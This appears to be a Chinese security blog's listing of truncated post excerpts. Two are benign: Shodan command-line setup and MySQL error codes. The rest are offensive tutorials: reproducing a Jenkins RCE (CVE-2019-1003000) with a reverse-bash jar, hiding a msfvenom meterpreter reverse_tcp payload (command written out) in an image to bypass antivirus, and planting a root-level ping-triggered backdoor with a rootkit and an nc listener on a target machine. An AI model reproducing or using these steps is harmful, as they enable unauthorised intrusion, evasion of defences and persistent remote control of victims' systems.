shodan会员版命令行详细使用说明

使用前奏:基于命令行的shodan会员版,首先需要拿到key(登录后账号信息里有),要不然会提示“Error: Please run “shodan init <api key>” before using this command”导入key: root:~$ shodan init T1N3uP0Lyeq5w0wxxxxxxxxxxxxxxx 如果未安装则需要安装shodan root:~$ pip install shodan //安装 root:~$ pip install -U shodan //后续升级 正式进入命令详细说明之前,先用娱乐一下: curl parrot.live //丧的时候对着会舞动的终端发发呆还是可以的 curl wttr.in //终端版天气显示,”宅”心仁厚久了,出门还是有必要看一眼的 1.显示自己公网IP root: […]

查看全部


Mysql错误编码集合解释

由于更新很频繁,这些文件中可能包含这里未列出的额外错误消息。 · 错误:1000 SQLSTATE: HY000 (ER_HASHCHK) 消息:hashchk · 错误:1001 SQLSTATE: HY000 (ER_NISAMCHK) 消息:isamchk · 错误:1002 SQLSTATE: HY000 (ER_NO) 消息:NO · 错误:1003 SQLSTATE: HY000 (ER_YES) 消息:YES · 错误:1004 SQLSTATE: HY000 (ER_CANT_CREATE_FILE) 消息:无法创建文件’%s’ (errno: %d) · 错误:1005 SQLSTATE: HY000 (ER_CANT_CREATE_TABLE) 消息:无法创建表’%s’ (errno: %d) · 错误:1006 SQLS […]

查看全部


jenkins RCE(CVE-2019-1003000)复现

前言:漏洞详情直接搜cve编号查看即可,这里直接复现 1.制作一个反弹bash的jar包放在公网可远程调用,以下代码保存为jkrce.java代码如下: 2.创建文件夹META-INF/serverices/,编译并写jkrce类到META-INF/serverices/org.codehaus.groovy.plugins.Runners里,如下: 3.在公网服务器里,创建路径/tools/jenkins/1/ 4.poc xxx.xxx.xxx.xxx替换成公网地址即可,其他不用填写。 等待反弹成功,成功后web页面提示如下:

查看全部


使用图片携带msf payload反弹绕过各种AV

#使用说明 1.先找一个高清大图片,四位数*四位数 那种以上的jpg或者png高清大图,命名为1.jpg ,低于四位数的高清大图会失败,一般图片大小,大于1M小于2M即可 。 2.使用msfvenom生成一个powershell的反弹的payload,一定要用64位的,32位的弹不出来●msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=2333 -f psh-reflection > 1.ps1 3.使用Invoke-PSImage.ps1 把powershell 反弹的payload 压缩进高清大图里。操作如下:打开cmd,并执行powershell,之后再顺序执行以下命令●Import-Module .\Invoke-PSImage.ps1●Invoke-PSImage -Scr […]

查看全部


ping-backdoor使用,配合Rootkit使用效果更佳

#使用方法:1.把下列代码复制到目标机器中,保存名为 ping-backdoor.c 2.使用gcc编译●gcc -static -o ping-backdoor ping-backdoor.c●strip ping-backdoor注:如果这一步出现错误,可以尝试安装静态编译解决 yum install glibc-static 3.在目标机器中运行,要以root权限开启后门●./ping-backdoor 4.在接收反弹的电脑上使用magic.py生成范本数据包,用来ping的时候填充,促发反弹●python3 magic.py reverse_ip reverse_port //类似这样 ac1f07931a0a2a7e 5.在反弹的电脑上开启nc监听●nc -lvvp reverse_port //要和使用magic.py时候填写的端口一致 6.在反弹的电脑上ping 带有后门的主 […]

查看全部